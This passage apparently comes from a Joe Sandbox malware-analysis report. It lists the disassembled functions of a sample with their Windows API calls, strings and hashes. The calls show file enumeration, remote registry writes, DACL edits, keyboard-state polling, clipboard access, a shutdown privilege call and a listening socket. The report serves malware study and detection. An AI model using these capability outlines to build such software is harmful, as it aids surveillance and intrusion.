                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9CE87
                                              • __swprintf.LIBCMT ref: 00B9CED3
                                              • __swprintf.LIBCMT ref: 00B9CF16
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • __swprintf.LIBCMT ref: 00B9CF6A
                                                • Part of subcall function 00B538C8: __woutput_l.LIBCMT ref: 00B53921
                                              • __swprintf.LIBCMT ref: 00B9CFB8
                                                • Part of subcall function 00B538C8: __flsbuf.LIBCMT ref: 00B53943
                                                • Part of subcall function 00B538C8: __flsbuf.LIBCMT ref: 00B5395B
                                              • __swprintf.LIBCMT ref: 00B9D007
                                              • __swprintf.LIBCMT ref: 00B9D056
                                              • __swprintf.LIBCMT ref: 00B9D0A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: 7e40cbeb3fc5f9f055c041becd6fb5f307c9244bbbb6a88f3dcc0f07fcd7f522
                                              • Instruction ID: 1f9831d288b1adc1f56f9f35472730b6d130a862013487db8e62196b922ae192
                                              • Opcode Fuzzy Hash: 7e40cbeb3fc5f9f055c041becd6fb5f307c9244bbbb6a88f3dcc0f07fcd7f522
                                              • Instruction Fuzzy Hash: 37A12CB1404304ABC714EFA4D986EAFB7ECEF94704F400969F59587191EB30EE48CB62
                                              Function 00B9F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9F5F9
                                              • _wcscmp.LIBCMT ref: 00B9F60E
                                              • _wcscmp.LIBCMT ref: 00B9F625
                                              • GetFileAttributesW.KERNEL32(?), ref: 00B9F637
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00B9F651
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B9F669
                                              • FindClose.KERNEL32(00000000), ref: 00B9F674
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B9F690
                                              • _wcscmp.LIBCMT ref: 00B9F6B7
                                              • _wcscmp.LIBCMT ref: 00B9F6CE
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9F6E0
                                              • SetCurrentDirectoryW.KERNEL32(00BEB578), ref: 00B9F6FE
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9F708
                                              • FindClose.KERNEL32(00000000), ref: 00B9F715
                                              • FindClose.KERNEL32(00000000), ref: 00B9F727
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: eb75590ce207f173ac8744497a6aa0835f95c436557db85d492def0bf49813a5
                                              • Instruction ID: 2b70620ac4dc92fa240755bd311864bc3d64995318d4729420c3642fea4cceb9
                                              • Opcode Fuzzy Hash: eb75590ce207f173ac8744497a6aa0835f95c436557db85d492def0bf49813a5
                                              • Instruction Fuzzy Hash: EE316D71A4121AAADF10AFA5AC49EEE77ECEF09321F1441F5E804E31A0DF74DE44CA60
                                              Function 00BB0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB0FB3
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BC0980,00000000,?,00000000,?,?), ref: 00BB1021
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BB1069
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BB10F2
                                              • RegCloseKey.ADVAPI32(?), ref: 00BB1412
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB141F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: 5dbdb8f3e194b7917eb303552cfe717e84bbe6a31eaa46953d9dd9cdcfb4b357
                                              • Instruction ID: e44c2244cbd6fd3d6f452c57cb5f38cbee40e574414a6531e52e1249cd69c26e
                                              • Opcode Fuzzy Hash: 5dbdb8f3e194b7917eb303552cfe717e84bbe6a31eaa46953d9dd9cdcfb4b357
                                              • Instruction Fuzzy Hash: E0025A716006019FCB14EF29C895E6AB7E5FF89710F1489ACF85A9B362CB70ED41CB91
                                              Function 00B9F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9F756
                                              • _wcscmp.LIBCMT ref: 00B9F76B
                                              • _wcscmp.LIBCMT ref: 00B9F782
                                                • Part of subcall function 00B94875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B94890
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B9F7B1
                                              • FindClose.KERNEL32(00000000), ref: 00B9F7BC
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B9F7D8
                                              • _wcscmp.LIBCMT ref: 00B9F7FF
                                              • _wcscmp.LIBCMT ref: 00B9F816
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9F828
                                              • SetCurrentDirectoryW.KERNEL32(00BEB578), ref: 00B9F846
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9F850
                                              • FindClose.KERNEL32(00000000), ref: 00B9F85D
                                              • FindClose.KERNEL32(00000000), ref: 00B9F86F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: bb866a56ddfe2487a48b312b23aac0fef4cc43395b9a5a8bf59ca7edcf2e49ae
                                              • Instruction ID: 1baef6e389f958c6c7efdae362bcd434d40ee0f4ba0f7943b0835bc6090130a0
                                              • Opcode Fuzzy Hash: bb866a56ddfe2487a48b312b23aac0fef4cc43395b9a5a8bf59ca7edcf2e49ae
                                              • Instruction Fuzzy Hash: 7031807290021AAADF10ABB59C88EEA77ECDF09371F1001F5E814E71A0DB70DE458A60
                                              Function 00B888CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B88E3C
                                                • Part of subcall function 00B88E20: GetLastError.KERNEL32(?,00B88900,?,?,?), ref: 00B88E46
                                                • Part of subcall function 00B88E20: GetProcessHeap.KERNEL32(00000008,?,?,00B88900,?,?,?), ref: 00B88E55
                                                • Part of subcall function 00B88E20: HeapAlloc.KERNEL32(00000000,?,00B88900,?,?,?), ref: 00B88E5C
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B88E73
                                                • Part of subcall function 00B88EBD: GetProcessHeap.KERNEL32(00000008,00B88916,00000000,00000000,?,00B88916,?), ref: 00B88EC9
                                                • Part of subcall function 00B88EBD: HeapAlloc.KERNEL32(00000000,?,00B88916,?), ref: 00B88ED0
                                                • Part of subcall function 00B88EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B88916,?), ref: 00B88EE1
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B88931
                                              • _memset.LIBCMT ref: 00B88946
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B88965
                                              • GetLengthSid.ADVAPI32(?), ref: 00B88976
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00B889B3
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B889CF
                                              • GetLengthSid.ADVAPI32(?), ref: 00B889EC
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B889FB
                                              • HeapAlloc.KERNEL32(00000000), ref: 00B88A02
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B88A23
                                              • CopySid.ADVAPI32(00000000), ref: 00B88A2A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B88A5B
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B88A81
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B88A95
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: b5dd507fbc4c1f7c7dfbb2ca5b3ae1470e4eb679d36b0036104e916b2f7d73de
                                              • Instruction ID: fbe521563176a3e32e28296db39569e11a97dc8f526670662572ba1c14f8ddb2
                                              • Opcode Fuzzy Hash: b5dd507fbc4c1f7c7dfbb2ca5b3ae1470e4eb679d36b0036104e916b2f7d73de
                                              • Instruction Fuzzy Hash: 3F611A75910209FFDF04EF95DC45EAEBBB9FF08304F44816AE915A72A0DB359A05CB60
                                              Function 00BB0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB0B0C
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BB0BAB
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BB0C43
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BB0E82
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB0E8F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 8fb0d7f95505435a7f870168932bbf4bc6031bf9c47006178aa026036edd2192
                                              • Instruction ID: 2b9b8bbd9ead498c22da57ea99266f877381edd8f0b171a8ee6689201c6ad5be
                                              • Opcode Fuzzy Hash: 8fb0d7f95505435a7f870168932bbf4bc6031bf9c47006178aa026036edd2192
                                              • Instruction Fuzzy Hash: 34E13931614214AFCB14EF28C895E7BBBE8EF89714F0489ADF849DB261DB70E901CB51
                                              Function 00B90508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00B90530
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00B905B1
                                              • GetKeyState.USER32(000000A0), ref: 00B905CC
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00B905E6
                                              • GetKeyState.USER32(000000A1), ref: 00B905FB
                                              • GetAsyncKeyState.USER32(00000011), ref: 00B90613
                                              • GetKeyState.USER32(00000011), ref: 00B90625
                                              • GetAsyncKeyState.USER32(00000012), ref: 00B9063D
                                              • GetKeyState.USER32(00000012), ref: 00B9064F
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00B90667
                                              • GetKeyState.USER32(0000005B), ref: 00B90679
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 665a05967109b2105b88e00e51ef9e80cacff8669b9e916b95ebc5cb08b82ced
                                              • Instruction ID: edc8e42f3932cfebf7e489f9579fb09da8a3cd27a412e5a3a2641367ee4560ba
                                              • Opcode Fuzzy Hash: 665a05967109b2105b88e00e51ef9e80cacff8669b9e916b95ebc5cb08b82ced
                                              • Instruction Fuzzy Hash: 4E41DB305247CA6EFF31B76488447B5BEE0EB65304F0840EAD9C5875C2EBA499D4CFA2
                                              Function 00B9443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __swprintf.LIBCMT ref: 00B94451
                                              • __swprintf.LIBCMT ref: 00B9445E
                                                • Part of subcall function 00B538C8: __woutput_l.LIBCMT ref: 00B53921
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B94488
                                              • LoadResource.KERNEL32(?,00000000), ref: 00B94494
                                              • LockResource.KERNEL32(00000000), ref: 00B944A1
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00B944C1
                                              • LoadResource.KERNEL32(?,00000000), ref: 00B944D3
                                              • SizeofResource.KERNEL32(?,00000000), ref: 00B944E2
                                              • LockResource.KERNEL32(?), ref: 00B944EE
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B9454F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: 135ae715dd4f4cc7060b23d55f8c97f21e0677ad2317a404b2d620ec517ecdaa
                                              • Instruction ID: 220d78275eab35c54decc484979f7fb7ee8bff29de4e1cb60318367c21a1fc74
                                              • Opcode Fuzzy Hash: 135ae715dd4f4cc7060b23d55f8c97f21e0677ad2317a404b2d620ec517ecdaa
                                              • Instruction Fuzzy Hash: 11314D7150121AABDF11AFA0AD98EBB7BECEB18341F0444A5F91597250EB74DA22CB60
                                              Function 00BA4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: a3f7fb6a6787b59536d0cd8ae5ac791116996f350da7d53c907d87a6a2d33f64
                                              • Instruction ID: cb717dc82776b87d5416ff0258cf85ec8dc5deecb3bef905b068e29ddc506da5
                                              • Opcode Fuzzy Hash: a3f7fb6a6787b59536d0cd8ae5ac791116996f350da7d53c907d87a6a2d33f64
                                              • Instruction Fuzzy Hash: B0218B31255210DFEB01AF24EC49F2E77E8EF89721F1080A9F9469B2A1CF74AD10CB94
                                              Function 00B9FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B9FA83
                                              • FindClose.KERNEL32(00000000), ref: 00B9FB96
                                                • Part of subcall function 00B352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B352E6
                                              • Sleep.KERNEL32(0000000A), ref: 00B9FAB3
                                              • _wcscmp.LIBCMT ref: 00B9FAC7
                                              • _wcscmp.LIBCMT ref: 00B9FAE2
                                              • FindNextFileW.KERNEL32(?,?), ref: 00B9FB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 2185952417-438819550
                                              • Opcode ID: c7ba55a2053cc59b0fa531987d090348c2e932597d9a896c3fc3ca96e283d43d
                                              • Instruction ID: 0a7e372a0035e1dce073d792a3b4329990c325b2eba65bb49fcbc8e829164f68
                                              • Opcode Fuzzy Hash: c7ba55a2053cc59b0fa531987d090348c2e932597d9a896c3fc3ca96e283d43d
                                              • Instruction Fuzzy Hash: 8C415D71D4021AAFCF14DF64CC99AEEBBF4EF09364F1445A5E814E62A1EB309E84CB50
                                              Function 00B95778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B89399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B893E3
                                                • Part of subcall function 00B89399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B89410
                                                • Part of subcall function 00B89399: GetLastError.KERNEL32 ref: 00B8941D
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00B957B4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: 6eb341aa97868fbf0164663fe1a481a409f5d447ec1ceedc4971f186265f1414
                                              • Instruction ID: 84014e7464b1f7468778cc0accb4bbaafc23c171d1d791eda02ffd2d0e6036d9
                                              • Opcode Fuzzy Hash: 6eb341aa97868fbf0164663fe1a481a409f5d447ec1ceedc4971f186265f1414
                                              • Instruction Fuzzy Hash: 3A012431690702EAEF3962E49C8AFBB36D8EB04740F1000B9F813D20E2DA181D048364
                                              Function 00BA696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BA69C7
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA69D6
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00BA69F2
                                              • listen.WSOCK32(00000000,00000005), ref: 00BA6A01
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6A1B
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00BA6A2F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 852c847d74e5c02684fbb22e8e86dbb4d15bc732a2c842e3cbdcd3077354a28e
                                              • Instruction ID: 155b5d0369821edb8ff932233b637bc87c7fc190bceb40a3ba0c0226eab3497b
                                              • Opcode Fuzzy Hash: 852c847d74e5c02684fbb22e8e86dbb4d15bc732a2c842e3cbdcd3077354a28e
                                              • Instruction Fuzzy Hash: 3D21D0742006049FCB10FF68C889E2EB7E9EF49724F248199E956A73A1CB30AC01CB90
                                              Function 00B31663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B31DD6
                                              • GetSysColor.USER32(0000000F), ref: 00B31E2A
                                              • SetBkColor.GDI32(?,00000000), ref: 00B31E3D
                                                • Part of subcall function 00B3166C: DefDlgProcW.USER32(?,00000020,?), ref: 00B316B4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 68a707358aeb311fba7573e09d74d05a0c194ba4d30dc2404e50e266ba321a66
